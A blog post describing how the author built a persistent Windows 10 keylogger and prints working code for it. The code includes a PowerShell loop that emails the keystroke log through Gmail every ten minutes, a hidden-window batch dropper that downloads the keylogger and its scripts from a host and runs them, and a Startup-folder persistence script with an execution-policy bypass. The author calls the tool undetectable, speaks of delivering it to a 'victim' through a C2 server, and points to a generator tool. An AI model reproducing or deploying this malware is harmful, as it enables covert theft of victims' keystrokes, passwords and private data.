Persistent windows 10 keylogger (keylogiq)

In this post, I will describe how I created undetectable keylogger for windows 10. In the first place, why I decided to create my own tool, if already keyloggers exist. Well, I could not find any, which includes some additional functions as sending results over email every each X minutes, I want. In addition, most important, I could not find the one, which have persistent option. Therefore, as soon as computer is rebooted or turned on, keylogger will start recording again. It was also important for me to create a tool, which will have options for upgrading of attack, by adding e.g. keygrabber, backdoor ,etc.

However, due to this tool was created mostly for education purposes and fun, I did not bother how accurate in recording of special characters it is. I found the source of code written in C and I tested it. It worked fine, so I decided to go further in implementation of other things. Maybe you are asking why I decided to use keylogger written in C and not in e.g. python. Well, I think C is most suitable when we talking about extension of file. Compiled code in C gives you .exe extension, which is executable in windows by default, while python gives you extension .py, for which execution is needed python preinstalled on windows machine. Of course, there are also the ways to convert python code into exe file, but many times, it does not work well, at least for me.

For now, I covered keylogger for itself. Next step was to implement sending results over email. I tried to implement this function over C inside the keylogger of itself, but unfortunately I failed. It was enough frustrations with C so I decided to implement this function over powershell script, which anyway I needed for setting up persistent. Here is the part of code written in powershell, which send email on each 600 seconds with attachment (Records.txt) where keylogger is recording results of keystrokes. It is repeating until process of keylogger is active.

cd $env:USERPROFILE"\AppData\Local\Temp"
$SMTPServer = "smtp.gmail.com"
$SMTPPort = "587"
$Username = "[email protected]"
$Password = "qwertz12345"

Do
{

$to = "[email protected]"
$subject = "key_records"
$body = "key records"
$attachment = "Record.txt"

$message = New-Object System.Net.Mail.MailMessage
$message.subject = $subject
$message.body = $body
$message.to.add($to)
$message.from = $username
$message.attachments.add($attachment)
$smtp = New-Object System.Net.Mail.SmtpClient($SMTPServer, $SMTPPort);
$smtp.EnableSSL = $true
$smtp.Credentials = New-Object System.Net.NetworkCredential($Username, $Password);
$smtp.send($message);

start-sleep 5

$message.Dispose() 

$proc = Get-Process

start-sleep 600

} While ($proc.name -contains 'keylogger') 

In addition I created main batch file, which includes next functions. It start in a background powershell script, which download keylogger.exe, records.txt, email_powershell.ps1 and persistent.bat files into specific folder and execute the processes. All files are stored in Users\(user name)\AppData\Local\Temp , just persistent.bat file is stored in location where files for auto start at boot are located (Users\(user name)\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup). Here is the code of main.bat:

@ECHO OFF
cd %userprofile%\AppData\Local\Temp
start PowerShell -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://192.168.1.110/Record.txt','Record.txt');(New-Object System.Net.WebClient).DownloadFile('http://192.168.1.110/smkscr.ps1','smkscr.ps1');(New-Object System.Net.WebClient).DownloadFile('http://192.168.1.110/krec.exe','krec.exe');Start-Process 'krec.exe';.\smkscr.ps1; 
cd "%userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
start PowerShell -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://192.168.1.110/pers.bat', 'pers.bat')

And here is the code of persistent.bat file which is nothing special. When it is executed it run the keylooger and email powershell script again.

@ECHO OFF
cd %userprofile%\AppData\Local\Temp
start PowerShell -windowstyle hidden -ExecutionPolicy Bypass Start-Process 'krec.exe';.\smkscr.ps1

That’s it, now I have fully functional undetectable keylogger for windows 10, which is sending me results on email forever. Well, until it is detected by user :). All I need is to transfer files on my C2 server and make the victim to run my main.bat file…

For the end I created tool/script for a Linux which will create all necessary files for you. All you need is to inpute gmail account, password, how often you want to receive results on email and hosting address for needed files. And do not forget to enable access to less secure apps in your gmail account, otherwise you will not receive mails. You can find this tool on the following link.

Add a Comment